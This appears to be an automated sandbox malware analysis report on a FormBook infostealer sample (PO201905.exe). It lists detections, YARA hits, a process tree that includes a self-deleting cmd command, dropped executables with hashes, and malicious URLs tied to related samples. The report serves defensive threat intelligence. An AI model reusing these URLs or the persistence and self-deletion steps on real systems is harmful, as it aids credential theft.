FormBook malware detected 17->52 54 Creates an undocumented autostart registry key 17->54 56 Tries to steal Mail credentials (via file access) 17->56 58 2 other signatures 17->58 25 firefox.exe 1 17->25         started        28 cmd.exe 17->28         started        signatures12 process13 file14 34 C:\Users\user\AppData\...\KM3logrf.ini, data 25->34 dropped

Simulations

Behavior and APIs

TimeTypeDescription
21:16:47API Interceptor5290x Sleep call for process: PO201905.exe modified
21:24:53API Interceptor120x Sleep call for process: explorer.exe modified

Antivirus and Machine Learning Detection

Initial Sample

SourceDetectionScannerLabelLink
PO201905.exe16%virustotalBrowse
PO201905.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe100%Joe Sandbox ML
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe100%Joe Sandbox ML
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe16%virustotalBrowse

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
12.1.9rxlgd1bcduf.exe.1060000.0.unpack100%Joe Sandbox MLDownload File
0.1.PO201905.exe.fb0000.0.unpack100%Joe Sandbox MLDownload File
12.0.9rxlgd1bcduf.exe.1060000.0.unpack100%Joe Sandbox MLDownload File
0.2.PO201905.exe.fb0000.3.unpack100%Joe Sandbox MLDownload File
0.0.PO201905.exe.fb0000.0.unpack100%Joe Sandbox MLDownload File

Domains

SourceDetectionScannerLabelLink
www.dazhen.ltd.w.kunlunsl.com0%virustotalBrowse
www.dazhen.ltd0%virustotalBrowse

URLs

No Antivirus matches

Yara Overview

Initial Sample

SourceRuleDescriptionAuthor
PO201905.exeEmbedded_PEunknownunknown

PCAP (Network Traffic)

No yara matches

Dropped Files

SourceRuleDescriptionAuthor
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeEmbedded_PEunknownunknown
C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeEmbedded_PEunknownunknown

Memory Dumps

SourceRuleDescriptionAuthor
00000006.00000000.4489812531.05280000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489859117.053A0000.00000008.sdmpEmbedded_PEunknownunknown
0000000C.00000000.4605949292.01060000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4499027121.02FD0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4499136614.03160000.00000008.sdmpEmbedded_PEunknownunknown
0000000C.00000001.4606191992.01060000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483829349.021F0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489594683.04FD0000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483813760.021E0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4481973939.000D0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483543065.01C90000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489196294.04B80000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4482978785.00960000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485301200.02FD0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485257832.02F00000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000002.4520123297.025C0000.00000040.sdmpEmbedded_PEunknownunknown
00000000.00000002.4518783364.00FBA000.00000040.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483012656.009B0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496745744.01F30000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000002.4518101641.00200000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496645451.01C90000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485383734.03160000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000000.3459785508.00FB0000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485420844.03230000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4495827412.00730000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489866128.053E0000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000002.4518759786.00FB0000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496873251.020D0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489753137.051E0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489219800.04C00000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4498956019.02F00000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4495226765.000D0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483619954.01F30000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4498910122.02E40000.00000008.sdmpEmbedded_PEunknownunknown
0000000C.00000002.4699103178.000E0000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000003.4480049922.00B60000.00000004.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489600354.04FE0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4498921613.02E50000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489914928.05460000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4482006795.00120000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000002.4518066485.000F0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496065227.00960000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000001.3460208049.00FB0000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489653245.050E0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4482163480.00340000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4499198783.03230000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4495408457.00340000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485235319.02E50000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4495818939.00720000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483709645.020D0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4482523631.00720000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000003.4508449289.00256000.00000004.sdmpEmbedded_PEunknownunknown
00000006.00000000.4499267957.03330000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496687348.01D70000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485229761.02E40000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485325684.03030000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496894367.020E0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4499078335.03090000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4497202502.021F0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4495256653.00120000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4496097002.009B0000.00000008.sdmpEmbedded_PEunknownunknown
0000000C.00000002.4700605804.000F0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483572029.01D70000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000002.4518214232.0025C000.00000004.sdmpEmbedded_PEunknownunknown
00000006.00000000.4499056992.03030000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485467608.03330000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4482532068.00730000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485342639.03090000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489179656.04B70000.00000008.sdmpEmbedded_PEunknownunknown
00000000.00000002.4518110322.00210000.00000040.sdmpEmbedded_PEunknownunknown
00000006.00000000.4497183880.021E0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4489291554.04D40000.00000008.sdmpEmbedded_PEunknownunknown
00000002.00000002.4480303987.004B0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4483716872.020E0000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4482412222.00680000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4495735054.00680000.00000008.sdmpEmbedded_PEunknownunknown
00000006.00000000.4499297653.033B0000.00000002.sdmpEmbedded_PEunknownunknown
00000006.00000000.4492371223.086E0000.00000002.sdmpEmbedded_PEunknownunknown
00000000.00000003.4481262828.00CA0000.00000004.sdmpEmbedded_PEunknownunknown
00000000.00000002.4520262603.026A1000.00000040.sdmpEmbedded_PEunknownunknown
00000006.00000000.4485576438.033B0000.00000002.sdmpEmbedded_PEunknownunknown

Unpacked PEs

SourceRuleDescriptionAuthor
6.0.explorer.exe.1c90000.46.unpackEmbedded_PEunknownunknown
0.2.PO201905.exe.fb0000.3.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.5460000.36.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.340000.2.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.4d40000.28.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2e50000.54.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2f00000.17.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.1c90000.8.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.5280000.33.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.720000.4.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.d0000.38.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3230000.22.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.960000.6.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3230000.60.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.4b80000.26.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.1f30000.10.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.960000.6.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.1d70000.47.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2e50000.54.raw.unpackEmbedded_PEunknownunknown
12.2.9rxlgd1bcduf.exe.f0000.1.unpackEmbedded_PEunknownunknown
0.2.PO201905.exe.200000.1.raw.unpackEmbedded_PEunknownunknown
12.0.9rxlgd1bcduf.exe.1060000.0.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.4fd0000.29.raw.unpackEmbedded_PEunknownunknown
0.0.PO201905.exe.fb0000.0.raw.unpackEmbedded_PEunknownunknown
12.2.9rxlgd1bcduf.exe.f0000.1.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.20e0000.50.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.4fe0000.30.raw.unpackEmbedded_PEunknownunknown
12.2.9rxlgd1bcduf.exe.e0000.0.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.4fe0000.30.unpackEmbedded_PEunknownunknown
0.2.PO201905.exe.210000.2.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.51e0000.32.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2e50000.16.unpackEmbedded_PEunknownunknown
12.1.9rxlgd1bcduf.exe.1060000.0.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.21f0000.52.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3160000.21.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.21f0000.52.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2fd0000.56.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.d0000.0.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.1d70000.9.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2e40000.15.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3090000.20.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2f00000.17.raw.unpackEmbedded_PEunknownunknown
0.1.PO201905.exe.fb0000.0.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.720000.42.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.120000.1.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3030000.19.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2f00000.55.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2e40000.53.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.20d0000.11.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.21e0000.13.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.21e0000.13.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.730000.43.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.d0000.0.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2fd0000.56.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.340000.2.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.21f0000.14.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.720000.42.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.53a0000.34.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3090000.20.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2fd0000.18.raw.unpackEmbedded_PEunknownunknown
0.2.PO201905.exe.f0000.0.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.4b70000.25.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3230000.22.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.340000.40.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.5460000.36.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2e40000.53.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2e40000.15.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.53e0000.35.unpackEmbedded_PEunknownunknown
12.2.9rxlgd1bcduf.exe.e0000.0.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.730000.43.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3330000.23.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.720000.4.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.d0000.38.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.1f30000.48.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3090000.58.unpackEmbedded_PEunknownunknown
0.1.PO201905.exe.fb0000.0.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.21f0000.14.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.53e0000.35.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.120000.1.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.340000.40.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2fd0000.18.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.120000.39.unpackEmbedded_PEunknownunknown
0.2.PO201905.exe.f0000.0.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.20e0000.12.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3090000.58.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.4fd0000.29.unpackEmbedded_PEunknownunknown
0.2.PO201905.exe.200000.1.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3030000.19.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.1c90000.46.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.4c00000.27.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.730000.5.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.120000.39.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.20d0000.49.unpackEmbedded_PEunknownunknown
12.1.9rxlgd1bcduf.exe.1060000.0.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3230000.60.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3160000.59.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3030000.57.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.51e0000.32.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.730000.5.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.4b70000.25.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3030000.57.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.20d0000.11.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.9b0000.7.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.5280000.33.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3160000.21.raw.unpackEmbedded_PEunknownunknown
12.0.9rxlgd1bcduf.exe.1060000.0.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.9b0000.45.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.960000.44.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.4b80000.26.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.1f30000.10.raw.unpackEmbedded_PEunknownunknown
0.2.PO201905.exe.210000.2.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.1d70000.9.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.960000.44.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.4d40000.28.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3160000.59.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2f00000.55.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.4c00000.27.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.53a0000.34.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.1c90000.8.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.21e0000.51.unpackEmbedded_PEunknownunknown
0.2.PO201905.exe.25c0000.4.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.20e0000.12.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.20e0000.50.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.1f30000.48.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.2e50000.16.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.21e0000.51.raw.unpackEmbedded_PEunknownunknown
0.2.PO201905.exe.fb0000.3.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.9b0000.7.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3330000.23.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3330000.61.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.20d0000.49.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.1d70000.47.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.9b0000.45.unpackEmbedded_PEunknownunknown
0.0.PO201905.exe.fb0000.0.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.680000.41.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.3330000.61.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.680000.41.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.33b0000.62.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.680000.3.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.50e0000.31.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.680000.3.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.33b0000.24.raw.unpackEmbedded_PEunknownunknown
0.2.PO201905.exe.25c0000.4.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.86e0000.37.raw.unpackEmbedded_PEunknownunknown
6.0.explorer.exe.50e0000.31.raw.unpackEmbedded_PEunknownunknown

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
208.91.197.9159Purchase Order# 4500077718.exeGet hashmaliciousBrowse
  • www.baroarytala.com/m66/
ultranna.exeGet hashmaliciousBrowse
  • alsafatechnical.com/mega/system/js/
17JUNE JUNE DUE WIRE2020.exeGet hashmaliciousBrowse
  • www.clipsfordrips.com/ch/
onetouch.exeGet hashmaliciousBrowse
  • www.greencoffeebeans.store/h35/?2d=F4KbkDzXdL3n/n2bVvDJlczwguahdFSiKi10rXP+AEdO67KqottJuA4ciEWifuKSvFIyYkawr+N3TMXo8lAblg==&7n=4hZx
ric.txt.exeGet hashmaliciousBrowse
  • www.wishfirm.com/lu/?D6Alv=GFvW3ldfO3z+xma4kHLmEU8hA9TuNVRwOdPt5yXmf4enfsow4RKvmqJy8kFTDfwvGNJe&pn=W2JdANnxC0p0
4product samples pdf.exeGet hashmaliciousBrowse
  • www.reset-rt.com/ca/?3fcxV=BpKT4Tpzv4HLudN5VFvIAmHvINcgMMwGkYk2nq9i1XFrqA6oDVqiuHJiexSQvKDdGO96M0fMU22JNjhMfhdVAA==&wlT=3fzd
69Quantity product pdf.exeGet hashmaliciousBrowse
  • www.reset-rt.com/ca/
23order pdf.exeGet hashmaliciousBrowse
  • www.hoteltawagroup.com/private/
40P282928292201.exeGet hashmaliciousBrowse
  • www.gymnasticsrama.com/gr/?id=GhloqT+nB2/h/uVgN/EBCnebwZyeSdNVPP3f1kmBjZw2K2tziqtsz5ayyAtEPshBpD2FQwUlGBOpWETwXdHrHQ==&pd=6lyL8bm
http://skoda.vwg.in/Get hashmaliciousBrowse
  • skoda.vwg.in/favicon.ico
resmg.exeGet hashmaliciousBrowse
  • www.cryptpulse.com/zxasyukr.php
Bombermania.exeGet hashmaliciousBrowse
  • live.interballs.com/reporting_server/
http://vip.allcrypt.bid/tracker?smart_link_id=2&aff_id=149Get hashmaliciousBrowse
  • vip.allcrypt.bid/favicon.ico
59Purchase Order No 73273287.exeGet hashmaliciousBrowse
  • www.wealthhike.com/ge/?rzN=8Vcqw398G31ZArl6gxUBmJFlUKLquUEJSoO7FDkhDd6C7mzpl667AOAC4IFmUdi9Ct02rXqPwbov3AFXiCFMXw==&1b=eV8LXha0VXYTR
59order pdf.exeGet hashmaliciousBrowse
  • www.hoteltawagroup.com/private/?stZx=PzfJIYzfKsAuzvBWBaGuPx3w+RikrTSJMZfKVAAlNb2aEmMlKkv6Yh+1liRwiF7paVlFfmfI/RWDXcAg&pfWt=6lyL8bm

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
a767.dscg3.akamai.net13Fil.exeGet hashmaliciousBrowse
  • 2.18.212.26
42INVOICE.exeGet hashmaliciousBrowse
  • 23.10.249.50
https://directgloagns.com/mainGet hashmaliciousBrowse
  • 23.10.249.17
33CHANGE OF BANK DETAILS.exeGet hashmaliciousBrowse
  • 23.10.249.50
Report From Fax.htmGet hashmaliciousBrowse
  • 23.10.249.50
67Payment_Advice.exeGet hashmaliciousBrowse
  • 23.10.249.50
61Quotation 112718.exeGet hashmaliciousBrowse
  • 23.10.249.17
7Update-KB3984-x86.exeGet hashmaliciousBrowse
  • 23.10.249.17
3Update-KB4750-x86.exeGet hashmaliciousBrowse
  • 23.10.249.17
1Update-KB2375-x86.exeGet hashmaliciousBrowse
  • 23.10.249.50
1Update-KB7546-x86.exeGet hashmaliciousBrowse
  • 23.10.249.50
025.docGet hashmaliciousBrowse
  • 23.10.249.50
5Love_You_2018_3091048.jsGet hashmaliciousBrowse
  • 23.10.249.17
18Love_You_2018_38337808.jsGet hashmaliciousBrowse
  • 23.10.249.17
11Love_You_2018_26476512.jsGet hashmaliciousBrowse
  • 2.18.212.48
9Update-KB4265-x86.exeGet hashmaliciousBrowse
  • 23.10.249.17
12Update-KB7562-x86.exeGet hashmaliciousBrowse
  • 80.239.152.138
17file.dat.exeGet hashmaliciousBrowse
  • 23.10.249.17
31Update-KB8312-x86.exeGet hashmaliciousBrowse
  • 23.10.249.17
3Update-KB7390-x86.exeGet hashmaliciousBrowse
  • 23.10.249.50

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
unknownInvoice0186.pdfGet hashmaliciousBrowse
  • 192.168.0.40
P_2038402.xlsxGet hashmaliciousBrowse
  • 192.168.0.44
bad.pdfGet hashmaliciousBrowse
  • 192.168.0.44
RFQ.pdfGet hashmaliciousBrowse
  • 192.168.0.44
100323.pdfGet hashmaliciousBrowse
  • 192.168.0.44
Copy.pdfGet hashmaliciousBrowse
  • 127.0.0.1
2.exeGet hashmaliciousBrowse
  • 192.168.0.40
UPPB502981.docGet hashmaliciousBrowse
  • 192.168.0.44
Adm_Boleto.via2.comGet hashmaliciousBrowse
  • 192.168.0.40
00ECF4AD.exeGet hashmaliciousBrowse
  • 192.168.0.40
PDF_100987464500.exeGet hashmaliciousBrowse
  • 192.168.0.40
filedata.exeGet hashmaliciousBrowse
  • 192.168.0.40
.exeGet hashmaliciousBrowse
  • 192.168.1.60
33redacted@threatwave.comGet hashmaliciousBrowse
  • 192.168.1.71

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Startup

  • System is w7_3
  • PO201905.exe (PID: 3340 cmdline: 'C:\Users\user\Desktop\PO201905.exe' MD5: 27CF7E2BE6E049B2793AD9F38218EB01)
    • explorer.exe (PID: 1880 cmdline: C:\Windows\Explorer.EXE MD5: 8B88EBBB05A0E56B7DCC708498C02B3E)
      • autoconv.exe (PID: 1868 cmdline: unknown MD5: 09D786401F6CA6AEB16B2811B169F944)
      • ipconfig.exe (PID: 2692 cmdline: C:\Windows\System32\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
        • cmd.exe (PID: 3912 cmdline: /c del 'C:\Users\user\Desktop\PO201905.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • firefox.exe (PID: 3928 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: 028A018B533F955992C416E098A2A32C)
      • 9rxlgd1bcduf.exe (PID: 424 cmdline: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe MD5: 27CF7E2BE6E049B2793AD9F38218EB01)
  • cleanup

Created / dropped Files

C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe Download File
Process:C:\Windows\explorer.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):885760
Entropy (8bit):7.945569120298503
Encrypted:false
MD5:27CF7E2BE6E049B2793AD9F38218EB01
SHA1:15C4909F9BB5DB1B96992FEE27A15221CCCB4DBB
SHA-256:4A6F28896F4A16257ED2DBB0B71A3ED2D890B4BE65B5F500B74C81A003155D61
SHA-512:D7AEEF1AFC03DAC5404B2F877F6B70F4C89832EB16912AD7518B3E2211850536CAE140A13C1A7E824FA9848FB440BEB83CE5E889B7B29DA218DC5F3B87095435
Malicious:true
Yara Hits:
  • Rule: Embedded_PE, Description: unknown, Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe, Author: unknown
  • Rule: Embedded_PE, Description: unknown, Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe, Author: unknown
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%, Browse
  • Antivirus: Joe Sandbox ML, Detection: 100%, Browse
  • Antivirus: virustotal, Detection: 16%, Browse
Reputation:low
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RC.s.". .". .". yT. .". yT S". yT! .". .Z. .". .". t". yT% .". ..Q .". yT. .". Rich.". ........PE..L......\.................T...,......3........p....@.......................................@.................................l...P....................................q.................................@............p..P............................text....R.......T.................. ..`.rdata...+...p...,...X..............@..@.data....e.......X..................@....rsrc...............................@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\Fppxlgn\9rxlgd1bcduf.exe Download File
Process:C:\Windows\explorer.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):885760
Entropy (8bit):7.945569120298503
Encrypted:false
MD5:27CF7E2BE6E049B2793AD9F38218EB01
SHA1:15C4909F9BB5DB1B96992FEE27A15221CCCB4DBB
SHA-256:4A6F28896F4A16257ED2DBB0B71A3ED2D890B4BE65B5F500B74C81A003155D61
SHA-512:D7AEEF1AFC03DAC5404B2F877F6B70F4C89832EB16912AD7518B3E2211850536CAE140A13C1A7E824FA9848FB440BEB83CE5E889B7B29DA218DC5F3B87095435
Malicious:false
Reputation:low
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RC.s.". .". .". yT. .". yT S". yT! .". .Z. .". .". t". yT% .". ..Q .". yT. .". Rich.". ........PE..L......\.................T...,......3........p....@.......................................@.................................l...P....................................q.................................@............p..P............................text....R.......T.................. ..`.rdata...+...p...,...X..............@..@.data....e.......X..................@....rsrc...............................@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\KM3N36B6\KM3logim.jpeg Download File
Process:C:\Windows\System32\ipconfig.exe
File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Size (bytes):58952
Entropy (8bit):7.3285493456826405
Encrypted:false
MD5:CD6128969CDE0D03526CF95117B0E952
SHA1:5D23AB00957C3FB40B21A9DB95F6289483CF1262
SHA-256:DD056E4C28C2A05F11AA7CB2061AAB4A07B171A267C55602919741FCC5D03EBC
SHA-512:E80C3D611580C25209052A7C4C5DE063A3E7568B2C4E706779721263F36E4B79EE7E5D68A699A75BEDA1C3650B6B15E8D87185B79F1C0DB3B5A71C20E1E302D0
Malicious:false
Reputation:low
